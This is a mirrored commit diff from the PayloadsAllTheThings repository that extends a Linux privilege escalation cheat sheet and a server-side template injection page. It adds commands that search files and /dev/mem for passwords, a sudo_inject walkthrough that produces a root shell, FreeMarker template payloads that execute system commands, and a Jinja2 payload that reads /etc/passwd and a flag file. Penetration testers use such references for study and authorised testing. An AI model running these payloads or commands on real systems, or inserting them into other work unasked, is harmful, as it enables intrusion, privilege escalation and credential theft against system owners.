mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-11 13:46:16 +02:00
sudo_inject + SSTI FreeMarker + Lin PrivEsc passwords
This commit is contained in:
Swissky
parent
b8e74fe0ba
commit
b4633bbb66
|
|
@ -13,6 +13,10 @@
|
|||
## Summary
|
||||
|
||||
* [Checklist](#checklist)
|
||||
* [Looting for passwords](#looting-for-passwords)
|
||||
* [Files containing passwords](#files-containing-passwords)
|
||||
* [Last edited files](#last-edited-files)
|
||||
* [In memory passwords](#in-memory-passwords)
|
||||
* [Scheduled tasks](#scheduled-tasks)
|
||||
* [Cron jobs](#cron-jobs)
|
||||
* [Systemd timers](#systemd-timers)
|
||||
|
|
@ -27,6 +31,7 @@
|
|||
* [NOPASSWD](#nopasswd)
|
||||
* [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd)
|
||||
* [Doas](#doas)
|
||||
* [sudo_inject](#sudo-inject)
|
||||
* [GTFOBins](#gtfobins)
|
||||
* [Wildcard](#wildcard)
|
||||
* [Writable /etc/passwd](#writable---etc---passwd)
|
||||
|
|
@ -111,6 +116,29 @@
|
|||
* Checks to see if the host has Docker installed
|
||||
* Checks to determine if we're in an LXC container
|
||||
|
||||
## Looting for passwords
|
||||
|
||||
### Files containing passwords
|
||||
|
||||
```powershell
|
||||
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
|
||||
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
|
||||
```
|
||||
|
||||
### Last edited files
|
||||
|
||||
Files that were edited in the last 10 minutes
|
||||
|
||||
```powershell
|
||||
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
|
||||
```
|
||||
|
||||
### In memory passwords
|
||||
|
||||
```powershell
|
||||
strings /dev/mem -n10 | grep -i PASS
|
||||
```
|
||||
|
||||
## Scheduled tasks
|
||||
|
||||
### Cron jobs
|
||||
|
|
@ -216,7 +244,6 @@ sh-5.0# id
|
|||
uid=0(root) gid=1000(swissky)
|
||||
```
|
||||
|
||||
|
||||
## SUDO
|
||||
|
||||
### NOPASSWD
|
||||
|
|
@ -269,6 +296,24 @@ There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, rem
|
|||
permit nopass demo as root cmd vim
|
||||
```
|
||||
|
||||
### sudo_inject
|
||||
|
||||
Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject)
|
||||
|
||||
```powershell
|
||||
$ sudo whatever
|
||||
[sudo] password for user:
|
||||
# Press <ctrl>+c since you don't have the password.
|
||||
# This creates an invalid sudo tokens.
|
||||
$ sh exploit.sh
|
||||
.... wait 1 seconds
|
||||
$ sudo -i # no password required :)
|
||||
# id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
||||
Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf)
|
||||
|
||||
## GTFOBins
|
||||
|
||||
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
|
||||
|
|
@ -470,4 +515,5 @@ lxc exec mycontainer /bin/sh
|
|||
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)
|
||||
- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/)
|
||||
- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
|
||||
- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
|
||||
- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
|
||||
- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
|
||||
|
|
@ -20,6 +20,8 @@
|
|||
* [Code execution](#code-execution)
|
||||
* [Smarty](#smarty)
|
||||
* [Freemarker](#freemarker)
|
||||
* [Basic injection](#basic-injection)
|
||||
* [Code execution](#code-execution)
|
||||
* [Jade / Codepen](#jade---codepen)
|
||||
* [Velocity](#velocity)
|
||||
* [Mako](#mako)
|
||||
|
|
@ -137,11 +139,17 @@ $output = $twig > render (
|
|||
|
||||
## Freemarker
|
||||
|
||||
Default functionality.
|
||||
You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
|
||||
|
||||
```python
|
||||
<#assign
|
||||
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||
### Basic injection
|
||||
|
||||
The template can be `${3*3}` or the legacy `#{3*3}`
|
||||
|
||||
### Code execution
|
||||
|
||||
```js
|
||||
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
|
||||
```
|
||||
|
||||
## Jade / Codepen
|
||||
|
|
@ -228,6 +236,7 @@ The above injections have been tested on Flask application.
|
|||
```python
|
||||
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
|
||||
```
|
||||
|
||||
### Write into remote file
|
||||
|
|
|
|||
Loading…
Reference in New Issue